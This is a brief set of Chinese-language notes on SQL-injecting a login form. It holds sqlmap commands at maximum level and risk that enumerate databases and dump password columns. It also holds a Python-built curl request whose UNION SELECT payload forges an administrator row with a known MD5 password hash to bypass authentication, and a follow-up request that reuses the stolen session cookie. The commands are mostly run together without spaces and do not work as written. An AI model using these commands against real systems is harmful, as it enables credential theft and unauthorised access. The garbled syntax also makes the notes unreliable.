注入测试
找到登录接口,判别字段username password
然后输入指令
python sqlmap.py-u"https://xxx"--data="username=test&password=test"--batch--level=5--risk=3--threads=4--force-ssl --flush-session查看有哪些库表
python sqlmap.py-u"https://xxx"--data="username=test&password=test"--batch--level=5--risk=3--threads=4--force-ssl --flush-session根据数据库查看表中的列
python sqlmap.py-u"https:/xxx"--data="username=test&password=test"--batch--level=5--risk=3--threads=4--force-ssl --flush-session查看数据库密码字段
python sqlmap.py-u"https://xxxx"--data="username=test&password=test"--batch--dbms=sqlite--level=5--risk=3-pusername--threads=4-Tpasswd-C字段1,字段2,字段3,....--dump等效替代:
importhashlib target="test123"result_hash=",".join(str(ord(c))forcinhashlib.md5(target.encode()).hexdigest())print(f"curl -sk -c cookie.txt\"https://xxx\"--data-urlencode\"username=x\\\"UNION SELECT 1,CHAR(97,100,109,105,110),CHAR({result_hash}),CHAR(31995,32479,31649,29702,21592),NULL,NULL-- x\"--data-urlencode\"password={target}\"")为什么 x\\\"查看设备信息:
curl-sk-bcookies.txt"https://xxxx"